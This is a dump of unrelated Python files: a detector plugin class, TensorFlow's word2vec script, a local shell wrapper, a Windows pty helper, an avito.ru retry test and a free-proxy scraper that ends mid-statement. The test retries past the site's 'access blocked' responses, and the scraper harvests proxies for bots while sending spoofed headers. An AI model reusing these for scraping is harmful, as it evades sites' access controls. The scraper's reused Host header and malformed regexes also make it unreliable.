# Plot configurations
self.plots = [PluginPlotItem()]
# # Number of X bits per segment
# self.xbits = [8]
# # Number of Y bits per segment
# self.ybits = [8]
# # Number of pulse height bits per segment
# self.pbits = [8]
# # Number of detector segments
# self.segments = 1
# # Plot item config
# #self.plots = [PluginPlotItem(row = 0, column = 0, row_span = 1, column_span = 1, segment = 0)]
# self.plot = []
class SegmentConfig(object):
def __init__(self, xbit = 8, ybit = 8, pbit = 8, segment = 0):
"""Configuration for a detector segment"""
self.xbit = xbit
self.ybit = ybit
self.pbit = pbit
self.segment = segment
class PlotConfig(object):
def __init__(self, xbit = 8, ybit = 8, pbit = 8, segment = 0):
"""Configuration for a single plot"""
self.xbit = xbit
self.ybit = ybit
self.pbit = pbit
self.segment = segment
class PluginPlotItem(object):
def __init__(self, plot_config = PlotConfig(), name = ImplotWidget, row = 0, column = 0, row_span = 1,
column_span = 1, segment = 0):
"""Plot item configuration"""
self.name = name
self.row = row
self.column = column
self.row_span = row_span
self.column_span = column_span
self.plot_config = plot_config
# Base plugin. All plugins should inherit this class.
class BasePlugin(object):
def __init__(self):
"""Base plugin class"""
self._config = PluginConfig()
#self._config = config
# Data
self._data = PhotonData()
# Data queue
self._q = queue.SimpleQueue()
# Event used to signal pause/unpause
self._lock = threading.Event()
# Start thread as paused
self._lock.set()
self._sample_thread = threading.Thread(target = self._run)
# Flag for thread close (don't change in thread)
self._flag = False
print("BasePlugin loaded...")
def start(self):
"""Start plugin"""
if (not self._sample_thread.is_alive()):
self._sample_thread.start()
def stop(self):
"""Stop plugin"""
if (self._sample_thread.is_alive()):
# signal to stop thread...
self._flag = True
self.pause()
self._sample_thread.join()
print("thread closed...")
def pause(self):
"""Pause sampler"""
if (self._sample_thread.is_alive()):
self._lock.set()
def unpause(self):
"""Unpause sampler"""
if (self._sample_thread.is_alive()):
# Check that lock is locked...
self._lock.clear()
def get_config(self):
"""Get plugin configuration (of type PluginConfig)"""
return(self._config)
def _run(self):
"""Thread function -- primary sampling thread function"""
while(True):
if (self._lock.is_set()):
# Search for quit flag
if (self._flag):
print("Closing sampling thread")
return
time.sleep(0.01)
continue
# Fill data object with test fake data
#print("baseplugin sampler running...")
for i in range(244):
self._data.x[i] = i
self._data.y[i] = i
self._data.p[i] = i
self._data.segment = 0
self._data.len = 244
# Queue up the data...
self._q.put(self._data)
time.sleep(0.1)
def get_data(self):
"""Get sampler data
Return data if available
Return None if no data available
"""
if (not self._q.empty()):
try:
d = self._q.get_nowait()
except queue.Empty:
d = None
return(d)
else:
return(None)
def get_data_len(self):
"""Get amount of data in queue"""
return(self._q.qsize())
def load_plugin():
p = BasePlugin()
return(p)
|
word2vec_optimized.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy('france', 'paris', 'russia') and "
"model.nearby(['proton', 'elephant', 'maxwell']")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def build_graph(self):
"""Build the model graph."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, current_epoch, total_words_processed,
examples, labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
# Declare all variables we need.
# Input words embedding: [vocab_size, emb_dim]
w_in = tf.Variable(
tf.random_uniform(
[opts.vocab_size,
opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
name="w_in")
# Global step: scalar, i.e., shape [].
w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
# Global step: []
global_step = tf.Variable(0, name="global_step")
# Linear learning rate decay.
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001,
1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
# Training nodes.
inc = global_step.assign_add(1)
with tf.control_dependencies([inc]):
train = word2vec.neg_train(w_in,
w_out,
examples,
labels,
lr,
vocab_count=opts.vocab_counts.tolist(),
num_negative_samples=opts.num_samples)
self._w_in = w_in
self._examples = examples
self._labels = labels
self._lr = lr
self._train = train
self.step = global_step
self._epoch = current_epoch
self._words = total_words_processed
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
f.write("%s %d\n" % (tf.compat.as_text(opts.vocab_words[i]),
opts.vocab_counts[i]))
def build_eval_graph(self):
"""Build the evaluation graph."""
# Eval graph
opts = self._options
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._w_in, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, opts.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time = initial_words, time.time()
while True:
time.sleep(5) # Reports our progress once a while.
(epoch, step, words,
lr) = self._session.run([self._epoch, self.step, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
lr, rate),
end="")
sys.stdout.flush()
if epoch != initial_epoch:
break
for t in workers:
t.join()
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
global_step=model.step)
if FLAGS.interactive:
# E.g.,
# [0]: model.Analogy('france', 'paris', 'russia')
# [1]: model.Nearby(['proton', 'elephant', 'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
rubash.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Hint: https://stackoverflow.com/questions/19880190/interactive-input-output-using-python
# and https://stackoverflow.com/questions/31833897/python-read-from-subprocess-stdout-and-stderr-separately-while-preserving-order
# MS-DOS interactive cmd.exe: https://stackoverflow.com/a/33061437/966789
# Welcome to screen scraping world
# Если сделать алиасы в питоновском коде, то они будут работать везде - и в винде, и под линукс
import sys
import os
import fcntl
from subprocess import Popen, PIPE, STDOUT
import errno
import select
from multiprocessing import Process
import time
def Dump(fd):
reads = [fd]
while True:
ret = select.select(reads, [], [])
s = os.read(ret[0][0],4096)
sys.stdout.write(s)
sys.stdout.flush()
if sys.platform.startswith("linux"):
p = Popen("/bin/bash", shell = True, stdin = PIPE, stdout = PIPE, stderr = STDOUT, bufsize = 1)
proc = Process(target=Dump, args=(p.stdout.fileno(),))
proc.start()
while True:
if sys.platform == "win32":
p = Popen("cmd.exe /k ", shell = True, stdin = PIPE, stdout = PIPE, stderr = STDOUT, bufsize = 1)
s = raw_input("> ")
s = s.rstrip("\\") # Чтобы не уходило в бесконечный цикл
ss = s.strip() # когда случайно добавлены пробелы перед exit
if ss == "exit":
proc.terminate()
break
if len(ss) == 0: continue # ничего кроме пробельных символов нет
try:
if sys.platform.startswith("linux"):
p.stdin.write(s+"\n")
elif sys.platform == "win32":
p.stdin.write(s+"\r\n")
p.stdin.flush()
except IOError as e:
if e.errno == errno.EPIPE:
break
# stdout
if sys.platform == "win32":
while True:
try:
output,error = p.communicate()
sys.stdout.write(output+"\r\n")
except IOError as e:
continue
else:
break
time.sleep(0.2) # чтобы выхлоп stdout не затирал промт
|
winpty.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread
from cStringIO import StringIO
from Queue import Queue, Empty
class WinPty:
def __init__(self, stdin):
self._s = stdin
self._q = Queue()
def _read_next_char(stdin, queue):
while True:
char = stdin.read(1) # potentially blocking read
if char:
queue.put(char)
else:
break
self._t = Thread(target=_read_next_char, args=(self._s, self._q))
self._t.daemon = True
self._t.start() # read characters asynchronously from stdin
def read(self, blksize=-1, timeout=1):
buf = StringIO()
count = 0
try:
while count < blksize or blksize == -1:
next = self._q.get(block=timeout is not None, timeout=timeout)
buf.write(next)
count = count + 1
except Empty:
pass
return buf.getvalue()
|
tests.py
|
import time
from contextlib import suppress
from datetime import datetime
from logging.handlers import RotatingFileHandler
from threading import Thread
import prequests
import logging
from prequests import content_has
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s.%(msecs)03d|%(levelname)-4.4s|%(thread)-6.6s|%(funcName)-10.10s|%(message)s',
handlers=[logging.StreamHandler(),
RotatingFileHandler("log.log", maxBytes=100000000, backupCount=4)
])
def f():
while True:
try:
# prequests.Proxies.instance(proxies=['39.137.95.70:80'])
resp = prequests.get('https://www.avito.ru/sankt-peterburg/detskaya_odezhda_i_obuv/shapki_trikotazhnye_velyur_mei_molo_polarn_lindex_1917349145',
retry_on=(content_has('временно ограничен'), content_has('Доступ временно заблокирован')))
except Exception as e:
logging.exception('Exception while getting avito.ru')
threads = [Thread(target=f) for i in range(1)]
[t.start() for t in threads]
time.sleep(10000)
|
proxy-scraper.py
|
####### ##########
####### #######
'''
Date: August 2016
Script downloads the best HTTP proxies from free proxy websites
Saves a txt file with 1 proxy per line
This list can easily be used with other bots/programs
'''
####### #######
####### ##########
import time
import datetime
import urllib, urllib2
import threading
import Queue
import re
import StringIO
import gzip
import sys
import socket
socket.setdefaulttimeout(90)
# Reference https://love-python.blogspot.ca/2008/07/check-status-proxy-address.html
def is_bad_proxy(currentProxy):
try:
proxy_handler = urllib2.ProxyHandler({'http': currentProxy})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib2.install_opener(opener)
req = urllib2.Request('http://www.example.com') # change the URL to test here
sock = urllib2.urlopen(req)
except urllib2.HTTPError, e:
print 'Error code: ', e.code
return e.code
except Exception, detail:
print "ERROR:", detail
return True
return False
def remove_tags(text):
"""Remove html tags from a string"""
clean = re.compile('<.*?>')
return re.sub(clean, '', text)
def queueThread():
global proxyCount
ts = time.time()
thedate = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d-%H-%M-%S')
print ("Saving to proxylist-" + thedate + ".txt")
fout = open("proxylist-" + thedate + ".txt", "w")
while not workerQueue.empty():
line = remove_tags(workerQueue.get())
# if the port number is missing for the proxy
# add port 8080 as temporary port
# since it is the most popular port.
if line.endswith(':'):
line += '8080'
fout.write(line + "\n")
proxyCount+=1
fout.close()
def usproxy():
print "Grabbing: http://www.us-proxy.org/"
templs = []
url = "http://www.us-proxy.org/"
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
html = response.read()
templs = re.findall(r'<tr><td>(.*?)</td><td>', html)
templs2 = re.findall(r'</td><td>[1-99999].*?</td><td>', html)
for i in range(len(templs)):
temp = templs[i] + ":" + templs2[i].replace('</td><td>', '')
workerQueue.put(temp)
# ("usproxy() " + templs[i] + ":" + templs2[i].replace('</td><td>', ''))
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def proxylist():
print "Grabbing: http://proxy-list.org/"
primary_url = "http://proxy-list.org/english/index.php?p="
urls = []
for i in range(1, 11):
urls.append(primary_url + str(i))
for url in urls:
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
templs = re.findall(r'<li class="proxy">([1-99999].*)?</li>', html)
for line in templs:
workerQueue.put(line)
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def coolproxy():
print "Grabbing: http://www.cool-proxy.net/"
primary_url = "http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:"
urls = []
for i in range(1, 13):
urls.append(primary_url + str(i))
for url in urls:
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
templs = re.findall(r'str_rot13(.*?)</script>', html)
templs2 = re.findall(r'<td>[1-99999].*?</td>', html)
for i in range(len(templs)):
temp = templs[i].replace('("', '')#remove front of string
temp = temp.replace('")))', '')#remove back of string
temp = temp.decode('rot13').decode('base64')#decode from rot13 then from base64
workerQueue.put(temp + templs2[i].replace('<td>', ':').replace('</td>', ''))
# bug("coolproxy() " + temp + templs2[i].replace('<td>', ':').replace('</td>', ''))
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def freeproxylist():
print "Grabbing: http://free-proxy-list.net/"
url = "http://free-proxy-list.net/"
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
html = response.read()
templs = re.findall(r'<tr><td>(.*?)</td><td>', html)
templs2 = re.findall(r'</td><td>[1-99999].*?</td><td>', html)
for i in range(len(templs)):
workerQueue.put(templs[i] + ":" + templs2[i].replace('</td><td>', ''))
# bug("freeproxylist() " + templs[i] + ":" + templs2[i].replace('</td><td>', ''))
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def samair():
print "Grabbing: http://www.samair.ru/"
primary_url = "http://www.samair.ru/proxy/proxy-00.htm"
urls = []
for i in range(1, 31):
if i < 10:
urls.append(primary_url.replace("00", "0" + str(i)))
else:
urls.append(primary_url.replace("00", str(i)))
for url in urls:
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
links = re.findall(r'<tr><td>(.*?):(.*?)</td><td>', html)
for link in links:
workerQueue.put(link[0] + ":" + link[1])
# bug("samair() " + link[0] + ":" + link[1])
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def proxylisty():
print "Grabbing: http://www.proxylisty.com/"
primary_url = "http://www.proxylisty.com/ip-proxylist-"
urls = []
for i in range(1, 68):
urls.append(primary_url + str(i))
for url in urls:
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
templs = re.findall(r'<tr>\n<td>(.*?)</td>', html)
templs2 = re.findall(r'com/port/(.*?)-ip-list', html)
for i in range(len(templs)):
workerQueue.put(templs[i] + ":" + templs2[i])
# bug("proxylisty() " + templs[i] + ":" + templs2[i])
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def nntime():
print "\nGrabbing: http://nntime.com/"
primary_url = "http://nntime.com/proxy-list-00.htm"
urls = []
for i in range(1, 31):
if i < 10:
urls.append(primary_url.replace("00", "0" + str(i)))
else:
urls.append(primary_url.replace("00", str(i)))
for url in urls:
try:
response = urllib.urlopen(url)
html = response.read()
decoder_string = re.findall(r'<script type="text/javascript">\n(.*?)</script>', html)
decoderls = decoder_string[0].split(";")
temp_tuple = []
for itm in decoderls:
if itm:
temp_tuple.append((itm.split("=")))
decoder_dict = dict(temp_tuple)
ips = re.findall(r'></td><td>(.*?)<script type="text/javascript">document', html)
ports = []
templs = re.findall(r'<script type="text/javascript">.*?</script>', html)
for line in templs:
temp = line.replace('<script type="text/javascript">document.write(":"+', '')
temp = temp.replace(')</script>', '')
codes = temp.split("+")
temp_port = ""
for code in codes:
temp_port += decoder_dict[code]
ports.append(temp_port)
for i in range(len(ips)):
#print ips[i] + ":" + ports[i]
workerQueue.put(ips[i] + ":" + ports[i])
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def aliveproxy():
print "\nGrabbing: http://www.aliveproxy.com/"
urls = []
url = "http://www.aliveproxy.com/"
response = urllib.urlopen(url)
html = response.read()
pos = html.find("Socks 5")
html = html[:pos]
temp_urls = re.findall(r'href=[\'"]?([^\'" >]+)', html)
for itm in temp_urls:
if "http://www.aliveproxy.com/proxy-list/proxies.aspx/" in itm:
urls.append(itm)
for url in urls:
response = urllib.urlopen(url)
html = response.read()
templs = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):(\d{1,5})', html)
for itm in templs:
workerQueue.put(itm[0] + ":" + itm[1])
#============================================================================================
if __name__ == "__main__":
print "==========================="
print "Starting Proxy Scraper..."
print "==========================="
proxyCount = 0
workerQueue = Queue.Queue()
pQueueThread = threading.Thread(target=queueThread)
pQueueThread.setDaemon(True)
pProxylist = threading.Thread(target=proxylist)
pProxylist.setDaemon(True)
pUsproxy = threading.Thread(target=usproxy)
pUsproxy.setDaemon(True)
pFreeproxylist = threading.Thread(target=freeproxylist)
pFreeproxylist.setDaemon(True)
pCoolproxy = threading.Thread(target=coolproxy)
pCoolproxy.setDaemon(True)
pSamair = threading.Thread(target=samair)
pSamair.setDaemon(True)
#pProxylisty = threading.Thread(target=proxylisty)
#pProxylisty.setDaemon(True)
pAliveproxy = threading.Thread(target=aliveproxy)
pAliveproxy.setDaemon(True)
pNntime = threading.Thread(target=nntime)
pNntime.setDaemon(True)
print "All threads set, starting threads..."
pProxylist.start()
time.sleep(2)
pUsproxy.start()
time.sleep(2)
pFreeproxylist.start()
time.sleep(2)
pCoolproxy.start()
time.sleep(2)
pSamair.start()
time.sleep(2)
#pProxylisty.start()
#time.sleep(2)
pAliveproxy.start()
pNntime.start()
time.sleep(2)
print "Fetching data..."
print "\nPlease wait..."
print "\nIf it takes too long, try pressing enter, it may trigger the program to finish."
pProxylist.join()
pUsproxy.join()
pFreeproxylist.join()
pCoolproxy.join()
pSamair.join()
#pProxylist.join()
pAliveproxy.join()
pNntime.join()
if not workerQueue.empty():
pQueueThread.start()
pQueueThread.join()
print "Saved to file!\n"
print "Proxies found: " + str(proxyCount)
else:
